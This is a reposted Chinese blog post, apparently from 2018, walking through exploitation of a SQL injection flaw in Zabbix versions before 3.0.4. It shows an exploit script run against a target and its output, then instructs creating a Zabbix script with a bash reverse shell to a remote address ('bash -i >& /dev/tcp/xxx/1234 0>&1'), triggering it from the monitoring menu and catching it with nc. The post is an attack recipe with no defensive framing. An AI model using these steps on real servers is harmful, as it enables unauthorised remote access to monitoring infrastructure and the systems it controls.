Zabbix sql注入漏洞脚本执行反弹shell

转载 于 2018-05-18 19:22:00 发布 · 902 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/someone9/p/9057591.html
文章标签:

#shell #运维 #python

本文介绍了一种使用Python脚本探测并利用Zabbix软件中SQL注入漏洞的方法。通过执行特定的Python脚本,可以成功检测到目标系统中存在的SQL注入漏洞,并进一步实现通过反弹shell的方式获取远程访问权限。

exp检测是否存在SQL注入漏洞
root@ubuntu:~# python zabbix.py http://ip:9090/
+------------------------------------------------------------+
Python Zabbix<3.0.4 SQL注入 Exploit
success
+------------------------------------------------------------+
Zabbix 存在SQL注入漏洞!

管理员 用户名密码:None

管理员 Session_id:None
然后进行登录:管理——脚本——创建脚本写入反弹shell、
bash -i >& /dev/tcp/xxx/1234 0>&1

 

 

监测——触发器——主机

执行我们编写的反弹shell脚本:

Nc监听端口

 

转载于:https://www.cnblogs.com/someone9/p/9057591.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值